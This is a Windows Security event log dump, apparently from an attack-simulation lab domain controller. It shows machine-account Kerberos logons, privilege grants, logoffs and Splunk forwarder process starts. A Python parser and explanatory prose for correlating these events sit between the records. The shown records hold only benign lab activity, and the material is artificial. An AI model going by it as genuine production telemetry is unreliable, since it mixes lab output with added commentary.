Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73AC7F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59915
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263642
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC7F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263641
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC13
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263640
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73AC13
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59914
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263639
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC13
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263647
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73B9A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263646
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73B9A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59924
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263645
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73B9A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:18:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263648
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
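The records above repeat two instructions worth turning into code: a 4634 logoff "may be positively correlated with a logon event using the Logon ID value" (the same ID also ties a 4672 privilege grant to its 4624), and a 4688 carries the UAC token type as a message-table placeholder (%%1936) rather than the 1/2/3 the explanatory text describes. The parser and correlator below are an added example, not code from the page, from Splunk or from Microsoft. It parses the dump layout shown here (a key=value header ending at Message=, then the event's own "Section:" and "Field: value" lines, then explanatory text), and it assumes the standard mapping %%1936, %%1937, %%1938 to token types 1, 2, 3. SAMPLE is a constructed cut-down of the page's own records, kept only to make the block run offline. Note two things visible in the dump that the code has to handle: within one second the forwarder emits records newest first (RecordNumber 263641 before 263640), so file order is not event order, and Logon IDs repeat across reboots, so the session key should include the host (a boot identifier would be needed to be fully safe, and is not in these fields).

```python
"""Parse the multi-line Windows Security records in this dump (a Splunk
key=value header, then the event's Message text) and correlate 4624 / 4672 /
4634 on Logon ID; 4688 token types are decoded too. Added example; SAMPLE is
constructed to mirror the page's record layout, not taken from a live host."""
import re
from collections import defaultdict

TIMESTAMP_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
HEADER_RE = re.compile(r"^(\w+)=(.*)$")               # EventCode=4624
SECTION_RE = re.compile(r"^([A-Za-z][A-Za-z ]+):$")     # New Logon:
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()/\-]{0,40}): ?(.*)$")
# 4688 logs the UAC token type as a message-table code rather than 1/2/3
# (assumed mapping: %%1936 full, %%1937 elevated, %%1938 limited).
ELEVATION_TYPES = {"%%1936": 1, "%%1937": 2, "%%1938": 3}

SAMPLE = r"""
04/19/2021 02:17:18 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
RecordNumber=263641
Message=An account was logged off.
Subject:
Account Name: WIN-DC-209$
Logon ID: 0x73AC13
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value.
04/19/2021 02:17:18 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
RecordNumber=263640
Message=An account was successfully logged on.
Logon Information:
Logon Type: 3
Impersonation Level: Impersonation
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x73AC13
Network Information:
Source Network Address: fe80::4c41:d752:3570:2ca6
04/19/2021 02:17:18 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
RecordNumber=263639
Message=Special privileges assigned to new logon.
Subject:
Logon ID: 0x73AC13
Privileges: SeSecurityPrivilege
SeBackupPrivilege
04/19/2021 02:18:08 PM
EventCode=4688
ComputerName=win-dc-209.attackrange.local
RecordNumber=263648
Message=A new process has been created.
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
"""


def parse_events(text):
    """Split a dump into records, sorted by RecordNumber (file order is not event order)."""
    events, cur, section, last_key = [], None, None, None
    for line in (raw.strip() for raw in text.splitlines() if raw.strip()):
        if TIMESTAMP_RE.match(line):
            cur = {"time": line, "header": {}, "fields": defaultdict(dict)}
            events.append(cur)
            section = last_key = None
        elif cur is None:
            continue
        elif "Message" not in cur["header"] and (m := HEADER_RE.match(line)):
            cur["header"][m.group(1)] = m.group(2)
        elif m := SECTION_RE.match(line):
            section, last_key = m.group(1), None
        elif m := FIELD_RE.match(line):
            last_key = m.group(1)
            cur["fields"][section][last_key] = m.group(2)
        elif last_key == "Privileges":   # 4672 continues the list one per line
            cur["fields"][section][last_key] += " " + line
        # any other line is Microsoft's explanatory text and carries no data
    return sorted(events, key=lambda e: int(e["header"].get("RecordNumber", 0)))


def correlate_logons(events):
    """Join 4624 (logon), 4672 (privileges) and 4634 (logoff) on Logon ID.
    Logon IDs are unique only until reboot, so the key includes the host."""
    sessions = defaultdict(dict)
    for e in events:
        code, host, f = e["header"].get("EventCode"), e["header"].get("ComputerName"), e["fields"]
        if code == "4624":
            sessions[(host, f["New Logon"]["Logon ID"])].update(
                account=f["New Logon"]["Account Name"],
                logon_type=f["Logon Information"]["Logon Type"],
                impersonation=f["Logon Information"]["Impersonation Level"],
                source=f["Network Information"]["Source Network Address"],
                logon_time=e["time"])
        elif code == "4672":
            sessions[(host, f["Subject"]["Logon ID"])]["privileges"] = f["Subject"]["Privileges"].split()
        elif code == "4634":
            sessions[(host, f["Subject"]["Logon ID"])]["logoff_time"] = e["time"]
    return dict(sessions)


def process_creations(events):
    """(parent, child, UAC token type) per 4688; type 1 = full token."""
    return [(e["fields"]["Process Information"]["Creator Process Name"],
             e["fields"]["Process Information"]["New Process Name"],
             ELEVATION_TYPES.get(e["fields"]["Process Information"]["Token Elevation Type"]))
            for e in events if e["header"].get("EventCode") == "4688"]
```

Run `correlate_logons(parse_events(dump_text))` over the full export rather than SAMPLE to get one dict entry per network logon of WIN-DC-209$, each carrying its 4672 privilege list and, once the 4634 arrives, its logoff time; sessions that never receive a logoff_time are still open. The same dict lets you filter on the fields the page shows varying between records, for instance `impersonation == "Delegation"` or a source address other than ::1 and the link-local address, which is a cheaper first pass than reading each record by hand.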
04/19/2021 02:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263650
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x191c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263649
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263651
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1474
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263652
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x340
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263654
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1608
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263653
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x144c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263657
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F47F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263656
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73F47F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59937
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263655
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F47F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263668
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F90C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263667
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F9FA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263666
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FA42
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263665
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73FAB4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59942
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
